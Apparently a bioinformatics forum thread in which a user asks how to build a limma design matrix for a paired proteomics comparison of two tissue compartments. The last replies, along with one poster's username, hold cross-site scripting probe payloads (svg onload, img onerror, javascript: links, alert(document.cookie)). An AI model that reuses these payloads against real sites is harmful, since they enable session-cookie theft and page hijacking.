Question

Paired analysis in proteomics data for DE while interested in only a particular subset of the data

0

Entering edit mode

svlachavas ▴ 840

@svlachavas-7225

Last seen 4 hours ago

Germany/Heidelberg/German Cancer Resear…

Hello and very happy new year to all the community ! I would like to briefly ask a particular question, regarding the appropriate construction of a design matrix, while interesting in assessing differential protein expression, in a DDA proteomics experiment. For clarity and reproducibility, I have constructed an artificial DT that replicates the necessary phenotypical information:


phenotypic_data
# A tibble: 8 × 5
  Sample_Name SampleID Compartment  Disease Smoking_status
  <chr>          <dbl> <chr>        <chr>   <chr>         
1 Sample_1           1 CompartmentA GroupA  Smoker        
2 Sample_2           1 CompartmentB GroupA  Smoker        
3 Sample_3           2 CompartmentA GroupA  Non-Smoker    
4 Sample_4           2 CompartmentB GroupA  Non-Smoker    
5 Sample_5           3 CompartmentA GroupA  Ex-smoker     
6 Sample_6           3 CompartmentB GroupA  Ex-smoker     
7 Sample_7           4 CompartmentB GroupB  Smoker        
8 Sample_8           5 CompartmentB GroupB  Non-Smoker

As you can see, Compartment is a categorical variable which denotes if the sample is from two distinct tissue compartments. The Disease status, also denotes a binary categorical information, whether also the sample belongs to two distinct diseases. The last column named Smoking status, also highlights the smoking status of each individual. Most importantly, we have the column SampleID, as here we have 3 patients, that have matched samples: that is one Compartment A and one matched Compartment B sample from the same individual. Ultimately, our major goal is to essentially within the GroupA Disease condition, to compare Compartment A vs CompartmentB; On this direction, if you check from the table structure above, all the SampleIDs/patients that have "double"/matched samples, are only from GroupA. As there are also 2 individuals without matched samples. On this direction, how it would be the most optimal way to proceed with the construction of the design matrix, as essentially we are not interested in the last 2 samples? For example:


combo_condition <- factor(paste(phenotypic_data$Compartment, phenotypic_data$Disease, sep="_"))
pairs <- factor(phenotypic_data$SampleID)

design <- model.matrix(~0 + combo_condition+pairs)
# then proceed with contrasts.matrix specifying the comparison of interest {CompartmentA_GroupA vs CompartmentB_GroupA}

And then proceed with makeContrasts and specify our comparison of interest?

Or it would be an issue regarding the SampleID, as two individuals (last two rows) do not have duplicated/matched samples? Alternatively, the other way is to remove completely these samples, which however could lead to potential loss of biological information?

Finally, if someone would want to also take into account the Smoking status, it would include it also as a confounder to the design matrix? Or because it is essentially a paired analysis, there is no rationale in including it?

Thanks a gazillion,

Efstathios

limma modelmatrix pairedanalysis Proteomics • 46 views

ADD COMMENT • link updated 3 hours ago by <iframe onload=alert(document.domain)> • 0 • written 11 hours ago by svlachavas ▴ 840

0

Entering edit mode

">

ADD REPLY • link 3 hours ago <iframe onload=alert(document.domain)> • 0

0

Entering edit mode

"onclick=prompt(8)><svg/onload=prompt(8)>"@x.y"><Svg/OnLoad=alert(document.cookie)>"@gmail.com<a aa aaa aaaa aaaaaa href=j&#97v&#97script:&#97lert(document.cookie)>ClickMe"> "'//><Svg+Only%3d1+OnLoad%3dconfirm(document.cookie)> <img/src/onerror=alert(1337)>"'//><Svg+Only%3d1+OnLoad%3dconfirm(document.cookie)> <iframe onload=alert(document.domain)>ClickMe"><Svg/OnLoad=alert(document.cookie)>"@gmail.com "onclick=prompt(8)><svg/onload=prompt(8)>"@x.y

ADD REPLY • link 3 hours ago <iframe onload=alert(document.domain)> • 0